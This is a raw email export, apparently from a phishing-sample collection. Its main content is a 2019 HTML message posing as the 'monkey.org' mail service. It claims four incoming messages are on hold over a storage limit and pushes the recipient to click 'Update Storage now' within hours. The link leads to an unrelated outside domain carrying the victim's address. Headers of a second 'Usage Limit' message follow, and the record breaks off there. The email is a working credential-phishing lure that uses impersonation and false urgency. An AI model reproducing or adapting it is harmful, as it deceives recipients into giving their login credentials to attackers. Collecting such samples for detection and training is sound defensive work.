From: monkey.org  <civey@powellshvac.com>
To: jose@monkey.org
Subject: Incoming message(s) on-hold
Date: 09 Jul 2019 11:33:00 +0100
Message-ID: <20190709113300.25BE5B2426B97038@powellshvac.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - jedro9.adriadns.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - powellshvac.com
X-Get-Message-Sender-Via: jedro9.adriadns.com: authenticated_id: n.kiprijanovski@highway.rs
X-Authenticated-Sender: jedro9.adriadns.com: n.kiprijanovski@highway.rs
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 135

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.10240.17443"></HEAD>
<BODY style=3D"MARGIN: 0.5em">
<TABLE style=3D"FONT-SIZE: 18px; FONT-FAMILY: Roboto, RobotoDraft, Helvetic=
a, Arial, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; BORDER-COLLAP=
SE: collapse; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(120,63,4);=
 FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-IN=
DENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webk=
it-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-=
color: initial" cellSpacing=3D0 cellPadding=3D0=20
width=3D600 align=3Dcenter border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; PADDING-BOTTOM: 10px; PADDING-TOP: 25px; MARGIN: 0px" width=3D"100%" colS=
pan=3D3 align=3Dcenter>
<DIV>
<DIV align=3Dcenter>
<H2 style=3D"FONT-WEIGHT: normal; COLOR: black; LINE-HEIGHT: 22px"><STRONG>=
<FONT size=3D6><FONT face=3D"Helvetica, Arial, sans-serif">Incoming pending=
 messages....</FONT><FONT face=3D"comic sans ms, sans-serif">(4)</FONT></FO=
NT></STRONG></H2></DIV></DIV></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" width=3D100>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" width=3D400 align=3Dcenter>
<DIV>
<DIV align=3Dleft>
<P style=3D"FONT-SIZE: 16px; FONT-FAMILY: Helvetica, Arial, sans-serif; MAR=
GIN: 1em 0px; LINE-HEIGHT: 25px"><STRONG><FONT color=3D#555555>Hello,&nbsp;=
</FONT><FONT color=3D#222222>jose@monkey.org</FONT><BR></STRONG></P>
<P style=3D"COLOR: rgb(85,85,85); MARGIN: 1em 0px; LINE-HEIGHT: 25px"><STRO=
NG style=3D"FONT-SIZE: 16px; FONT-FAMILY: Helvetica, Arial, sans-serif">You=
r mailbox&nbsp;</STRONG><STRONG style=3D"FONT-SIZE: 16px; FONT-FAMILY: Helv=
etica, Arial, sans-serif; COLOR: rgb(120,63,4)"><FONT color=3D#222222>jose@=
monkey.org</FONT></STRONG><STRONG><SPAN style=3D"FONT-SIZE: 16px; FONT-FAMI=
LY: Helvetica, Arial, sans-serif">&nbsp;has reached its limit and you have<=
/SPAN></STRONG><STRONG>
 <SPAN style=3D"FONT-SIZE: 16px; FONT-FAMILY: Helvetica, Arial, sans-serif"=
>&nbsp;</SPAN><FONT size=3D4 face=3D"comic sans ms, sans-serif">(4)</FONT><=
/STRONG><STRONG><SPAN style=3D"FONT-SIZE: 16px; FONT-FAMILY: Helvetica, Ari=
al, sans-serif">&nbsp;unread mails pending, Kindly click below to update yo=
ur mail storage to our upgraded 80GB quota.</SPAN></STRONG></P></DIV></DIV>=
</TD>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" width=3D100>&nbsp;</TD></TR></TBODY></TABLE>
<TABLE style=3D"FONT-SIZE: 18px; FONT-FAMILY: Roboto, RobotoDraft, Helvetic=
a, Arial, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; BORDER-COLLAP=
SE: collapse; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(120,63,4);=
 FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-IN=
DENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webk=
it-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-=
color: initial" cellSpacing=3D0 cellPadding=3D0=20
width=3D600 align=3Dcenter border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" width=3D200>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; PADDING-TOP: 25px; MARGIN: 0px" width=3D200 align=3Dcenter>
<TABLE style=3D"BORDER-COLLAPSE: collapse" height=3D50 cellSpacing=3D0 cell=
Padding=3D0 width=3D200 align=3Dcenter border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px; border-radius: 4px" bgColor=3D#369dd8 height=3D50 width=3D20=
0 align=3Dcenter>
<DIV>
<DIV align=3Dcenter>
<P style=3D"FONT-SIZE: 16px; FONT-FAMILY: Helvetica, Arial, sans-serif; COL=
OR: rgb(85,85,85); MARGIN: 1em 0px; LINE-HEIGHT: 25px"><STRONG><A style=3D"=
COLOR: rgb(255,255,255); border-radius: 4px" href=3D"https://potndia.com/cs=
sd/late-code/index.php?email=3D jose@monkey.org" target=3D_blank data-safer=
edirecturl=3D"https://www.google.com/url?q=3Dhttps://buenosarestp.xyz/versi=
on/update?email%3D%5B%5B-Email-%5D%5D&amp;source=3Dgmail&amp;ust=3D15521518=
51573000&amp;usg=3DAFQjCNEaB7oetLKnGs9i3T4513JB8NC6Iw">
Update Storage now</A> &nbsp;&nbsp;</STRONG></P></DIV></DIV></TD></TR></TBO=
DY></TABLE></TD>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" width=3D200>
<P style=3D"FONT-SIZE: 16px; FONT-FAMILY: Helvetica, Arial, sans-serif; COL=
OR: rgb(85,85,85); MARGIN: 1em 0px; LINE-HEIGHT: 25px">&nbsp;</P></TD></TR>=
</TBODY></TABLE>
<DIV style=3D"FONT-SIZE: 18px; FONT-FAMILY: Roboto, RobotoDraft, Helvetica,=
 Arial, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM:=
 none; FONT-WEIGHT: 400; COLOR: rgb(34,34,34); FONT-STYLE: normal; ORPHANS:=
 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligat=
ures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; te=
xt-decoration-style: initial; text-decoration-color: initial">
<TABLE style=3D"BORDER-COLLAPSE: collapse" cellSpacing=3D0 cellPadding=3D0 =
width=3D600 align=3Dcenter border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; PADDING-TOP: 65px; MARGIN: 0px" width=3D"100%" colSpan=3D2>
<H5><EM style=3D"BACKGROUND-COLOR: rgb(255,255,255)"><FONT color=3D#ff0000>=
If you're no longer interested in receiving account updates on your mailbox=
 kindly Ignore this message and click unsubscribe using the link below. You=
 have few hours left to Update and avoid loosing mail data</FONT></EM></H5>=

<HR style=3D"BORDER-TOP: medium none; HEIGHT: 1px; BORDER-RIGHT: medium non=
e; BORDER-BOTTOM: medium none; COLOR: rgb(51,51,51); BORDER-LEFT: medium no=
ne; BACKGROUND-COLOR: rgb(221,221,221)">
</TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; PADDING-BOTTOM: 20px; MARGIN: 0px" height=3D70 vAlign=3Dmiddle width=3D"6=
0%">
<DIV>
<DIV align=3Dleft><SPAN style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, A=
rial, sans-serif; LINE-HEIGHT: 26px"><STRONG><FONT color=3D#181818>Sent to&=
nbsp;jose@monkey.org&nbsp;by&nbsp;</FONT><FONT color=3D#222222>monkey.org</=
FONT></STRONG></SPAN><BR><B><FONT size=3D2 face=3D"tahoma, sans-serif">Mail=
 Service</FONT></B></DIV></DIV></TD></TR></TBODY></TABLE></DIV></BODY></HTM=
L>

From jose@monkey.org Fri Jul 12 05:18:51 2019 +0000
Return-Path: administrator@no-reply.com
Delivered-To: jose@monkey.org
X-FDA: 75700128462.32.fruit55_6a59ef3fa053e
X-Spam-Summary: 75,0,0,9c2bcf9fbbafa591,d41d8cd98f00b204,administrator@no-reply.com,:,RULES_HIT:1:2:41:72:379:455:495:800:962:967:973:982:983:988:989:1189:1208:1221:1254:1260:1313:1314:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1560:1571:1575:1588:1589:1592:1594:1710:1714:1730:1749:1777:1792:1801:1981:2194:2198:2199:2200:2369:2525:2527:2551:2553:2561:2564:2682:2685:2859:2890:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3866:3867:3870:3872:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4052:4180:4181:4552:4603:4605:5007:6261:6360:6678:7652:7782:8583:8603:8957:9025:9121:9149:10004:10085:10185:10346:11026:11233:11473:11657:11658:11914:12043:12050:12297:12438:12658:12740:12895:12903:12963:12986:13139:13236:13237:13439:13846:14051:14096:18000:21063:21080:21325:21433:21450:21451:21483:21524:21611:21627:21731:21810:21819:21838:30001:30026:30054:30090:30091,0,RBL:64.79.88.26-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Ne
X-HE-Tag: fruit55_6a59ef3fa053e
X-Filterd-Recvd-Size: 11903
Received: from cmail.yoover.com (mail.yoover.com [64.79.88.26])
	by imf25.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 12 Jul 2019 05:18:50 +0000 (UTC)
Received: from [185.234.218.130] (unknown [185.234.218.130])
	by cmail.yoover.com (Postfix) with ESMTPA id 2CA881EC6199
	for <jose@monkey.org>; Fri, 12 Jul 2019 01:18:50 -0400 (EDT)
Content-Type: multipart/alternative; boundary="===============0668316794=="
MIME-Version: 1.0
Subject: Usage Limit
To: jose@monkey.org
